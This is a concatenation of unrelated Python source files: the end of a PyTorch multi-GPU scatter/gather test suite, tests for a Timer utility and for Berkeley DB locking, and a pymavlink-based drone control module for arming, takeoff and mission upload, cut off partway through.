self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
test_Timer.py
|
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import next
from builtins import *
from builtins import object
from j5basic import Timer
from j5test import Utils
import threading
import time
class TimerDriver(object):
def __init__(self, expecteddiff=1, expectarg=False):
self.lasttime = None
self.expecteddiff = expecteddiff
self.expectarg = expectarg
self.ticks = 0
self.errors = []
def timefunc(self, testarg=None):
tm = time.time()
self.ticks += 1
assert not self.expectarg or testarg is not None
if self.lasttime != None:
actual_diff = tm - self.lasttime
if abs(actual_diff - self.expecteddiff) > (float(self.expecteddiff) / 10):
self.errors.append("timefunc started at %r was %r later than last time %r" % (tm, actual_diff, self.lasttime))
print(self.errors[-1])
self.lasttime = tm
def sleepfunc(self, testarg=None):
"""takes an iterable and sleeps for item seconds for each item"""
next_sleep = next(testarg)
tm = time.time()
self.lasttime = tm
self.ticks += 1
print(tm, next_sleep, self.ticks)
if next_sleep:
time.sleep(next_sleep)
class TestTimer(object):
def sleep(self, seconds):
"""An overridable method to call time.sleep"""
time.sleep(seconds)
def finish_wait(self, thread, error_list, expected_sleep=0):
"""Waits for the thread to finish, checks for any errors in the given list. expected_sleep says how long we should have to wait for this..."""
thread.join()
assert not error_list
@Utils.if_long_test_run()
def test_onesec(self):
"""Test the one second resolution"""
tm = TimerDriver()
timer = Timer.Timer(tm.timefunc)
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
assert 2 <= tm.ticks <= 3
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_twosec(self):
"""Test a non one second resolution"""
tm = TimerDriver(2)
timer = Timer.Timer(tm.timefunc, resolution=2)
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(5)
timer.stop = True
assert tm.lasttime is not None
assert 2 <= tm.ticks <= 3
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_args(self):
"""Test passing args"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, args=(True,))
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_missed(self):
"""Test missing time events by sleeping in the target function"""
tm = TimerDriver(1)
timer = Timer.Timer(tm.sleepfunc, args=(iter([0,2,3,0,6]),))
thread = threading.Thread(target=timer.start)
thread.start()
start_time = time.time()
# make sure our sleep happens within the last 6-second pause
self.sleep(12)
print(time.time(), tm.lasttime)
timer.stop = True
assert tm.lasttime is not None
assert 4 <= tm.ticks <= 5
self.finish_wait(thread, tm.errors, 6)
@Utils.if_long_test_run()
def test_kwargs(self):
"""Test passing kwargs"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, kwargs={"testarg":True})
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
self.finish_wait(thread, tm.errors)
def test_short_run(self):
"""Test stopping immediately"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, kwargs={"testarg":True}, resolution=10)
thread = threading.Thread(target=timer.start)
thread.start()
timer.stop = True
assert tm.lasttime is None
self.finish_wait(thread, tm.errors)
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test01_simple..." % self.__class__.__name__
anID = self.env.lock_id()
if verbose:
print "locker ID: %s" % anID
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print "Aquired lock: %s" % lock
self.env.lock_put(lock)
if verbose:
print "Released lock: %s" % lock
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test02_threaded..." % self.__class__.__name__
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
self.assertTrue((end_time-start_time) >= 0.1)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print "%s: locker ID: %s" % (name, anID)
for i in xrange(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print "%s: Aquired %s lock: %s" % (name, lt, lock)
self.env.lock_put(lock)
if verbose:
print "%s: Released %s lock: %s" % (name, lt, lock)
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
drone.py
|
"""
drone.py
====================================
The core module of my drone mav project
"""
# Import mavutil
from pymavlink import mavutil
from pymavlink import mavwp
from pymavlink.dialects.v10 import ardupilotmega
import time
#Import threading for reading mavlink messages
import threading
class MavlinkMessage:
"""Generate mavlink messages."""
def __init__(self,master):
"""Initialize
Args:
master (object): master player
"""
#master connection
self.master = master
## The data coming from mavlink (not all the data are present)
#'GLOBAL_POSITION_INT'
self._lat = None
self._lon = None
self._alt = None
self._relative_alt = None
self._vx = None
self._vy = None
self._vz = None
self._heading = None
#'SYS_STATUS'
self._voltage = None
self._current = None
self._level = None
#'VFR_HUD'
self._airspeed = None
self._groundspeed = None
self._throttle = None
self._alt = None
self._climb = None
#'SERVO_OUTPUT_RAW'
self._servo1_raw = None
self._servo2_raw = None
self._servo3_raw = None
self._servo4_raw = None
self._servo5_raw = None
self._servo6_raw = None
self._servo7_raw = None
self._servo8_raw = None
#'GPS_RAW_INIT'
self._eph = None
self._epv = None
self._satellites_visible = None
self._fix_type = None
#'EKF_STATUS_REPORT'
self._ekf_poshorizabs = False
self._ekf_constposmode = False
self._ekf_predposhorizabs = False
self._ekf_flag = None
#'LOCAL_POSITION_NED'
self._north = None
self._east = None
self._down = None
#'HEARTBEAT'
self._flightmode = None
self._armed = False
self._system_status = None
self._autopilot_type = None # PX4, ArduPilot, etc.
self._vehicle_type = None # quadcopter, plane, etc.
#'ATTITUDE'
self._roll = None
self._pitch = None
self._yaw = None
self._rollspeed = None
self._pitchspeed = None
self._yawspeed = None
#'MISSION_COUNT'
self._msg_mission_count = None
#'MISSION_ITEM'
self._msg_mission_item = None
#'COMMAND_ACK'
self._msg_command_ack = None
#'MISSION_REQUEST'
self._wp = mavwp.MAVWPLoader()
self._wp_uploaded = None
self._msg_mission_request = None
self.messages = {
'GLOBAL_POSITION_INT' :self.__read_global_pos_int,
'SYS_STATUS' :self.__read_system_status,
'VFR_HUD' :self.__read_vfr_hud,
'SERVO_OUTPUT_RAW' :self.__read_servo_output_raw,
'GPS_RAW_INT' :self.__read_gps_raw_int,
'EKF_STATUS_REPORT' :self.__read_ekf_status_report,
'LOCAL_POSITION_NED' :self.__read_local_position_ned,
'HEARTBEAT' :self.__read_heartbeat,
'ATTITUDE' :self.__read_attitude,
#The variables for mavlink message listed below should be cleared once it is read.
'MISSION_COUNT' :self.__read_mission_count,
'MISSION_ITEM' :self.__read_mission_item,
'MISSION_REQUEST' :self.__read_mission_request,
'COMMAND_ACK' :self.__read_command_ack
}
#start new thread for getting data whenever object is called
self.data_read = threading.Thread(target = self.__update)
self.data_read.daemon = True # In daemon mode so that ctrl + c will close the program
self.data_read.start()
def __update(self):
while True:
#print("Here")
msg = self.master.recv_match()
if not msg:
continue
function = self.messages.get(msg.get_type(),lambda x:"Invalid")
function(msg)
def __read_global_pos_int(self,msg):
self._lat = msg.lat * 1e-7
self._lon = msg.lon * 1e-7
self._alt = msg.alt * 1e-3
self._relative_alt = msg.relative_alt * 1e-3
self._vx = msg.vx
self._vy = msg.vy
self._vz = msg.vz
self._heading = int(msg.hdg * 1e-2)
def __read_system_status(self,msg):
self._voltage = msg.voltage_battery
self._current = msg.current_battery
self._level = msg.battery_remaining
def __read_vfr_hud(self,msg):
self._airspeed = msg.airspeed
self._groundspeed = msg.groundspeed
self._throttle = msg.throttle
self._alt = msg.alt
self._climb = msg.climb
def __read_servo_output_raw(self,msg):
self._servo1_raw = msg.servo1_raw
self._servo2_raw = msg.servo2_raw
self._servo3_raw = msg.servo3_raw
self._servo4_raw = msg.servo4_raw
self._servo5_raw = msg.servo5_raw
self._servo6_raw = msg.servo6_raw
self._servo7_raw = msg.servo7_raw
self._servo8_raw = msg.servo8_raw
def __read_gps_raw_int(self,msg):
self._eph = msg.eph
self._epv = msg.epv
self._satellites_visible = msg.satellites_visible
self._fix_type = msg.fix_type
def __read_ekf_status_report(self,msg):
ekf_flags = msg.flags
# boolean: EKF's horizontal position (absolute) estimate is good
self._ekf_poshorizabs = (ekf_flags & ardupilotmega.EKF_POS_HORIZ_ABS) > 0
# boolean: EKF is in constant position mode and does not know it's absolute or relative position
self._ekf_constposmode = (ekf_flags & ardupilotmega.EKF_CONST_POS_MODE) > 0
# boolean: EKF's predicted horizontal position (absolute) estimate is good
self._ekf_predposhorizabs = (ekf_flags & ardupilotmega.EKF_PRED_POS_HORIZ_ABS) > 0
def __read_local_position_ned(self,msg):
self._north = msg.y
self._east = msg.x
self._down = msg.z
def __read_heartbeat(self,msg):
if self.master.probably_vehicle_heartbeat(msg):
self._flightmode = mavutil.mode_mapping_acm[msg.custom_mode]
self._armed = (msg.base_mode & mavutil.mavlink.MAV_MODE_FLAG_SAFETY_ARMED) != 0
self._system_status = msg.system_status
self._autopilot_type = msg.autopilot
self._vehicle_type = msg.type # quadcopter, plane, etc.
def __read_attitude(self,msg):
self._roll = msg.roll
self._pitch = msg.pitch
self._yaw = msg.yaw
self._rollspeed = msg.rollspeed
self._pitchspeed = msg.pitchspeed
self._yawspeed = msg.yawspeed
def __read_mission_count(self,msg):
self._msg_mission_count = msg
def __read_mission_item(self,msg):
self._msg_mission_item = msg
def __read_mission_request(self,msg):
if self._wp_uploaded is not None:
wp = self._wp.wp(msg.seq)
self.master.mav.send(wp)
self._wp_uploaded[msg.seq] = True
def __read_command_ack(self,msg):
self._msg_command_ack = msg
class Drone(MavlinkMessage):
def __init__(self,port):
#start connection on the given port
self.master = mavutil.mavlink_connection(port)
# store waypoints from the command
self._waypoints = {}
self._home = None
#wait_heartbeat can be called before MavlinkMessage class initialization
#after MavlinkMessage class initialization, due to thread for reading mavlink message,
#it is not advisable to even look for mavlink message inside methods of this class.
#instead, check for the mavlink message inside MavlinkMessage class by adding the respective message.
self.master.wait_heartbeat()
#set home location when initializing
msg = self.master.recv_match(type = 'GLOBAL_POSITION_INT',blocking = True)
self._home = Location(msg.lat*1e-7,msg.lon*1e-7,msg.alt*1e-3,msg.relative_alt*1e-3)
print("Home location set to lat = ", self._home.lat," lon = ",self._home.lon, "alt = ",self._home.alt)
#read current mission
self.mission_read()
MavlinkMessage.__init__(self,self.master)
def set_flight_mode(self,mode):
"""Set drone flight mode
Args:
mode (string): flight mode name such as 'GUIDED','LOITER','RTL'
"""
mavutil.mavfile.set_mode(self.master,mode,0,0)
def arm(self):
"""Drone arm
"""
self.master.mav.command_long_send(self.master.target_system,
self.master.target_component,
mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
0,
1, 0, 0, 0, 0, 0, 0)
def disarm(self):
"""Drone disarm
"""
self.master.mav.command_long_send(self.master.target_system,
self.master.target_component,
mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
0,
0, 0, 0, 0, 0, 0, 0)
def arm_and_takeoff(self,altitude,auto_mode = True):
"""Drone arm and takeoff
Args:
altitude (integer): altitude in meters(m)
auto_mode (bool, optional): continue auto mission after takeoff. Defaults to True.
"""
armable = False
while not armable:
armable = self.is_armable
self.set_flight_mode('GUIDED')
self.arm()
self.master.mav.command_long_send(0, 0,
mavutil.mavlink.MAV_CMD_NAV_TAKEOFF
,0, 0, 0, 0, 0, 0, 0, altitude)
if(auto_mode):
self.set_flight_mode('AUTO')
def simple_goto(self,location):
"""Drone goto a waypoint
Args:
location (Location): Location class with lat,lon and alt
"""
self.master.mav.mission_item_send(0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT,
mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 2, 0, 0,
0, 0, 0, location.lat, location.lon,
location.alt)
def set_home(self,home_location=None):
"""Drone set home
Args:
home_location (Location, optional): If location given, sets that location as home. If not given sets boot position as home. Defaults to None.
"""
if home_location == None:
home_location = self._home
self.master.mav.command_long_send(
self.master.target_system, self.master.target_component,
mavutil.mavlink.MAV_CMD_DO_SET_HOME,
1, # set position
0, # param1
0, # param2
0, # param3
0, # param4
home_location.lat, # lat
home_location.lon, # lon
home_location.alt) # alt
def mission_read(self, file_name = 'mission/mission_read.txt'):
"""Drone current mission read
Args:
file_name (str, optional): File name to store mission into. Defaults to 'mission_read.txt'.
"""
#ask for mission count
self.master.waypoint_request_list_send()
#wait for receive mavlink msg type MISSION_COUNT
msg = self.master.recv_match(type = ['MISSION_COUNT'],blocking = True)
waypoint_count = msg.count
print("msg.count:",waypoint_count)
output = 'QGC WPL 110\n'
mission_count = 0
for i in range(waypoint_count):
#ask for individual waypoint
self.master.waypoint_request_send(i)
#wait for receive mavlink msg type MISSION_ITEM
msg = self.master.recv_match(type = ['MISSION_ITEM'],blocking = True)
#commandline is used to store msg in a given format
commandline="%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (msg.seq,msg.current,msg.frame,msg.command,msg.param1,msg.param2,msg.param3,msg.param4,msg.x,msg.y,msg.z,msg.autocontinue)
output += commandline
#store the waypoints in waypoint dictionary
if (msg.command != 22):
if(msg.seq != 0): #i.e not home location
self._waypoints[mission_count] = {
'lat':msg.x,
'lng':msg.y,
'alt':msg.z,
'command':msg.command
}
else: #i.e home location
self._home.lat = msg.x
self._home.lon = msg.y
self._waypoints[mission_count] = {
'lat':self._home.lat,
'lng':self._home.lon
}
mission_count += 1
#write to file
with open(file_name,'w') as file_:
print("Write mission to file")
file_.write(output)
def mission_upload(self, file_name = 'mission/mission.txt'):
"""Drone mission upload from available mission text file
Args:
file_name (str, optional): File name to upload mission from. Defaults to 'mission.txt'.
Raises:
Exception: Mission file type not supported
"""
#clear waypoints before uploading, so that new waypoints can be added
self._waypoints.clear()
mission_count = 0
with open(file_name) as f:
for i, line in enumerate(f):
if i == 0:
if not line.startswith('QGC WPL 110'):
raise Exception('File is not supported WP version')
else:
linearray=line.split('\t')
ln_seq = int(linearray[0])
ln_current = int(linearray[1])
ln_frame = int(linearray[2])
ln_command = int(linearray[3])
ln_param1=float(linearray[4])
ln_param2=float(linearray[5])
ln_param3=float(linearray[6])
ln_param4=float(linearray[7])
ln_x=float(linearray[8])
ln_y=float(linearray[9])
ln_z=float(linearray[10])
ln_autocontinue = int(float(linearray[11].strip()))
#store in waypoints
if(ln_command != 22):
if(ln_seq != 0): #i.e not home location
self._waypoints[mission_count] = {
'lat':ln_x,
'lng':ln_y,
'alt':ln_z,
'command':ln_command
}
else:
self._waypoints[mission_count] = {
'lat':ln_x,
'lng':ln_y
}
mission_count += 1
p = mavutil.mavlink.MAVLink_mission_item_message(0, 0, ln_seq, ln_frame,
ln_command,
ln_current, ln_autocontinue, ln_param1, ln_param2, ln_param3, ln_param4, ln_x, ln_y, ln_z)
self._wp.add(p)
#while uploading mission, first home should be given
self.set_home()
#msg = self.master.recv_match(type = ['COMMAND_ACK'],blocking = True)
#print(msg)
print('Set home location: {0} {1}'.format(self._home.lat,self._home.lon))
time.sleep(1)
#send waypoint to airframe
self.master.waypoint_clear_all_send()
if self._wp.count() > 0:
self._wp_uploaded = [False] * self._wp.count()
self.master.waypoint_count_send(self._wp.count())
while False in self._wp_uploaded:
time.sleep(0.1)
self._wp_uploaded = None
#From this on, waypoint sending is handled inside MavlinkMessage Class whenever mission request is called
@property
def flight_plan(self):
"""Drone waypoints in which it will fly
Returns:
[dict]: a dictionary with all the waypoint that drone will fly
"""
return self._waypoints
@property
def is_armable(self):
"""Drone condition that whether it is safe to arm or not
Returns:
bool: safe to arm if True , not safe to arm if False
"""
# check that we have a GPS fix
# check that EKF pre-arm is complete
return (self._fix_type > 1) and self._ekf_predposhorizabs
@property
def ekf_ok(self):
"""Drone EKF Status
Returns:
bool: EKF ok if True, EKF not ok if False
"""
# use same check that ArduCopter::system.pde::position_ok() is using
if self._armed:
return self._ekf_poshorizabs and not self._ekf_constposmode
else:
return self._ekf_poshorizabs or self._ekf_predposhorizabs
@property
def system_status(self):
"""Drone system status
Returns:
string: The current status of drone. 'BOOT' means drone is booting, 'STANDBY' means drone is in standby mode.
"""
return {
0: 'UNINIT',
1: 'BOOT',
2: 'CALIBRATING',
3: 'STANDBY',
4: 'ACTIVE',
5: 'CRITICAL',
6: 'EMERGENCY',
7: 'POWEROFF',
8 : 'FLIGHT_TERMINATION'
}.get(self._system_status, None)
@property
def is_armed(self):
"""Arming status of the drone
Returns:
bool: True if armed, False if disarmed
"""
return self._armed
@property
def flight_mode(self):
"""Flight mode status of the drone
Returns:
string: 'GUIDED' if in guided mode, 'RTL' if in rtl mode and so on
"""
return self._flightmode
@property
def heading(self):
"""Heading of the drone
Returns:
integer: True heading of the drone
"""
return self._heading
@property
def groundspeed(self):
"""Ground speed of the drone
Returns:
float: Ground speed of the drone (m/s)
"""
return self._groundspeed
@property
def airspeed(self):
"""Airspeed of the drone
Returns:
float: Air speed of the drone (m/s)
"""
return self._airspeed
@property
def velocity(self):
"""Velocity of the drone in x,y,z frame
Returns:
Velocity: Velocity.vx = velocity in N direction, Velocity.vy = velocity in E direction, Velocity.vz = velocity in U direction
"""
return Velocity(self._vx, self._vy, self._vz)
@property
def battery(self):
"""Battery status of the drone
Returns:
Battery: Battery.voltage = voltage, Battery.current = current , Battery.level = charge percentage
"""
return Battery(self._voltage,self._current,self._level)
@property
def attitude(self):
"""Attitude status of the drone
Returns:
